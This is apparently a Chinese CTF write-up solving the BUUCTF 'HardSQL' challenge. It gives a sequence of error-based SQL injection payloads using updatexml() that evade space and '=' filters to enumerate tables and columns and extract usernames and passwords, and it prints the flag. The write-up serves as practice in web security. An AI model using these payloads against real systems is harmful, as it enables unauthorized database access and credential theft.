BUUCTF----[极客大挑战 2019]HardSQL

输入1'

单引号闭合

进行永真式判断

竟然说我是臭弟弟----八嘎(肯定是进行了过滤)
经过手法判断,过滤了=,空格,and等

报错注入updatexml()

报错注入顾名思义就是,通过特殊函数错误使用并使其输出错误结果来获取信息的

UPDATEXML() 是 MySQL 数据库中的一个函数,它用于修改 XML 文档中的值。这个函数返回修改后的 XML 文档,并可以根据指定的 XPath 表达式和新的值来更新 XML 文档中的特定部分。

UPDATEXML() 函数的语法如下:

UPDATEXML(xml_doc, xpath_expr, new_value)
xml_doc:要修改的 XML 文档。
xpath_expr:用于定位要修改的 XML 文档部分的 XPath 表达式。
new_value:要插入到 XML 文档中的新值。

查库

空格用()绕过
=用like绕过

1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

查表

1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

查字段

1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'--',password))from(H4rDsq1)),0x7e),1))#

只出现一半的flag,使用leftright函数,进行一半一半的查询

1'or(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)),0x7e),1))#
1'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e),1))#

拼接得到完整的flag

flag{b999a4be-8147-468b-8eba-360a077eaef0}
相关推荐
摸鱼也很难18 天前
小迪安全笔记 第四十四天 sql盲注 && 实战利用sql盲注 进行漏洞的利用
笔记·sql·安全·sql注入·盲注
摸鱼也很难23 天前
小迪安全第四十二天笔记 简单的mysql注入 && mysql的基础知识 用户管理数据库模式 && mysql 写入与读取 && 跨库查询
笔记·安全·web安全·sql注入·pikachu
风飘红技术中心2 个月前
2024-网鼎杯第二次模拟练习-web02
sql·web·ctf·sql注入·网鼎杯
ccc_9wy2 个月前
sql-labs靶场第十六关测试报告
数据库·sql·web安全·网络安全·sql注入·sqlmap·盲注
ccc_9wy2 个月前
sql-labs靶场第十五关测试报告
数据库·sql·web安全·网络安全·sql注入·sqlmap·布尔盲注
ccc_9wy2 个月前
sql-labs靶场第十四关测试报告
数据库·sql·web安全·网络安全·sql注入·sqlmap·报错注入
穿鞋子泡脚2 个月前
关于sql注入预编译的思考
数据库·sql·web安全·漏洞挖掘·sql注入
癞皮狗不赖皮3 个月前
WEB攻防- Oracle基本注入
数据库·oracle·sql注入
小小工匠3 个月前
加密与安全_三种常见的注入攻击
安全·sql注入·xss攻击·代码注入
我能突破限制.3 个月前
渗透测试(第三章SQL注入实战上)
网络安全·sql注入·报错注入·联合查询注入